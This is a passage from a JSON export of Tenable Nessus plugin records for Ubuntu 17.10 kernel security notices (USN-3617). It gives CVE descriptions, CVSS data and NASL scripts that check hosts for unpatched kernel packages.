(CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the\nLinux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB\ndriver in the Linux kernel did not properly validate device\ndescriptors. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in\nthe Linux kernel did not properly handle detach events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the\nLinux kernel did not properly handle suspend and resume events. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did\nnot properly handle holes in hugetlb ranges. A local attacker could\nuse this to expose sensitive information (kernel memory).\n(CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not\nproperly restrict access to the connection tracking helpers list. 
A\nlocal attacker could use this to bypass intended access restrictions.\n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting\n(xt_osf) module did not properly perform access control checks. A\nlocal attacker could improperly modify the system-wide OS fingerprint\nlist. (CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux\nkernel contained an out-of-bounds read when handling memory-mapped\nI/O. A local attacker could use this to expose sensitive information.\n(CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm\nimplementations in the Linux kernel did not properly handle\nzero-length inputs. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the\nstate of the underlying cryptographic hash algorithm. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly check permissions when a key request was performed on\na tasks' default keyring. A local attacker could use this to add keys\nto unauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file\nsystem implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the\nLinux kernel did not properly validate Generic Segment Offload (GSO)\npacket sizes. An attacker could use this to cause a denial of service\n(interface unavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS)\nimplementation in the Linux kernel contained an out-of-bounds during\nRDMA page allocation. 
An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-5332)\n\nMohamed Ghannam discovered a NULL pointer dereference in the RDS\n(Reliable Datagram Sockets) protocol implementation of the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-5333)\n\nFan Long Fei discovered that a race condition existed in loop block\ndevice implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-5344).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3617-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.13-raspi2 and / or\nlinux-image-raspi2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-raspi2\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 17.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-0861\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\", \"CVE-2018-5344\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3617-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-4.13.0-1016-raspi2\", pkgver:\"4.13.0-1016.17\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-raspi2\", pkgver:\"4.13.0.1016.14\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.13-raspi2 / linux-image-raspi2\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:25:04", "description": "It was discovered that a race condition leading to a use-after-free\nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. 
(CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel\nallowed passthrough of the diagnostic I/O port 0x80. An attacker in a\nguest VM could use this to cause a denial of service (system crash) in\nthe host OS. (CVE-2017-1000407)\n\nIt was discovered that a use-after-free vulnerability existed in the\nnetwork namespaces implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the\nLinux kernel did not properly validate endpoint metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the\nLinux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB\ndriver in the Linux kernel did not properly validate device\ndescriptors. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in\nthe Linux kernel did not properly handle detach events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the\nLinux kernel did not properly handle suspend and resume events. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. 
A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did\nnot properly handle holes in hugetlb ranges. A local attacker could\nuse this to expose sensitive information (kernel memory).\n(CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux kernel did not\nproperly restrict access to the connection tracking helpers list. A\nlocal attacker could use this to bypass intended access restrictions.\n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting\n(xt_osf) module did not properly perform access control checks. A\nlocal attacker could improperly modify the system-wide OS fingerprint\nlist. (CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux\nkernel contained an out-of-bounds read when handling memory-mapped\nI/O. A local attacker could use this to expose sensitive information.\n(CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm\nimplementations in the Linux kernel did not properly handle\nzero-length inputs. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the\nstate of the underlying cryptographic hash algorithm. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly check permissions when a key request was performed on\na task's default keyring. A local attacker could use this to add keys\nto unauthorized keyrings. 
(CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file\nsystem implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the\nLinux kernel did not properly validate Generic Segment Offload (GSO)\npacket sizes. An attacker could use this to cause a denial of service\n(interface unavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS)\nimplementation in the Linux kernel contained an out-of-bounds write during\nRDMA page allocation. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-5332)\n\nMohamed Ghannam discovered a NULL pointer dereference in the RDS\n(Reliable Datagram Sockets) protocol implementation of the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-5333)\n\nFan Long Fei discovered that a race condition existed in loop block\ndevice implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-5344)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-04T00:00:00", "title": "Ubuntu 17.10 : linux vulnerabilities (USN-3617-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "cpe:/o:canonical:ubuntu_linux:17.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic"], "id": "UBUNTU_USN-3617-1.NASL", "href": "https://www.tenable.com/plugins/nessus/108834", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3617-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108834);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/23\");\n\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-1000407\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\", \"CVE-2018-5344\");\n script_xref(name:\"USN\", value:\"3617-1\");\n\n script_name(english:\"Ubuntu 17.10 : linux vulnerabilities (USN-3617-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a race condition leading to a use-after-free\nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel\nallowed passthrough of the diagnostic I/O port 0x80. An attacker in a\nguest VM could use this to cause a denial of service (system crash) in\nthe host OS. (CVE-2017-1000407)\n\nIt was discovered that a use-after-free vulnerability existed in the\nnetwork namespaces implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the\nLinux kernel did not properly validate endpoint metadata. 
A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the\nLinux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB\ndriver in the Linux kernel did not properly validate device\ndescriptors. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in\nthe Linux kernel did not properly handle detach events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the\nLinux kernel did not properly handle suspend and resume events. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did\nnot properly handle holes in hugetlb ranges. A local attacker could\nuse this to expose sensitive information (kernel memory).\n(CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not\nproperly restrict access to the connection tracking helpers list. 
A\nlocal attacker could use this to bypass intended access restrictions.\n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting\n(xt_osf) module did not properly perform access control checks. A\nlocal attacker could improperly modify the system-wide OS fingerprint\nlist. (CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux\nkernel contained an out-of-bounds read when handling memory-mapped\nI/O. A local attacker could use this to expose sensitive information.\n(CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm\nimplementations in the Linux kernel did not properly handle\nzero-length inputs. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the\nstate of the underlying cryptographic hash algorithm. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly check permissions when a key request was performed on\na tasks' default keyring. A local attacker could use this to add keys\nto unauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file\nsystem implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the\nLinux kernel did not properly validate Generic Segment Offload (GSO)\npacket sizes. An attacker could use this to cause a denial of service\n(interface unavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS)\nimplementation in the Linux kernel contained an out-of-bounds during\nRDMA page allocation. 
An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-5332)\n\nMohamed Ghannam discovered a NULL pointer dereference in the RDS\n(Reliable Datagram Sockets) protocol implementation of the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-5333)\n\nFan Long Fei discovered that a race condition existed in loop block\ndevice implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-5344).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3617-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 17.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-0861\", \"CVE-2017-1000407\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\", \"CVE-2018-5344\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3617-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-4.13.0-38-generic\", pkgver:\"4.13.0-38.43\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-4.13.0-38-generic-lpae\", pkgver:\"4.13.0-38.43\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-4.13.0-38-lowlatency\", pkgver:\"4.13.0-38.43\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-generic\", pkgver:\"4.13.0.38.41\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.13.0.38.41\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.13.0.38.41\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.13-generic / 
linux-image-4.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:25:04", "description": "USN-3617-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10.\nThis update provides the corresponding updates for the Linux Hardware\nEnablement (HWE) kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS.\n\nIt was discovered that a race condition leading to a use-after-free\nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel\nallowed passthrough of the diagnostic I/O port 0x80. An attacker in a\nguest VM could use this to cause a denial of service (system crash) in\nthe host OS. (CVE-2017-1000407)\n\nIt was discovered that a use-after-free vulnerability existed in the\nnetwork namespaces implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the\nLinux kernel did not properly validate endpoint metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the\nLinux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB\ndriver in the Linux kernel did not properly validate device\ndescriptors. A physically proximate attacker could use this to cause a\ndenial of service (system crash). 
(CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in\nthe Linux kernel did not properly handle detach events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the\nLinux kernel did not properly handle suspend and resume events. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did\nnot properly handle holes in hugetlb ranges. A local attacker could\nuse this to expose sensitive information (kernel memory).\n(CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux kernel did not\nproperly restrict access to the connection tracking helpers list. A\nlocal attacker could use this to bypass intended access restrictions.\n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting\n(xt_osf) module did not properly perform access control checks. A\nlocal attacker could improperly modify the system-wide OS fingerprint\nlist. (CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux\nkernel contained an out-of-bounds read when handling memory-mapped\nI/O. A local attacker could use this to expose sensitive information.\n(CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm\nimplementations in the Linux kernel did not properly handle\nzero-length inputs. 
A local attacker could use this to cause a denial\nof service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the\nstate of the underlying cryptographic hash algorithm. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly check permissions when a key request was performed on\na task's default keyring. A local attacker could use this to add keys\nto unauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file\nsystem implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the\nLinux kernel did not properly validate Generic Segment Offload (GSO)\npacket sizes. An attacker could use this to cause a denial of service\n(interface unavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS)\nimplementation in the Linux kernel contained an out-of-bounds write during\nRDMA page allocation. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-5332)\n\nMohamed Ghannam discovered a NULL pointer dereference in the RDS\n(Reliable Datagram Sockets) protocol implementation of the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash). 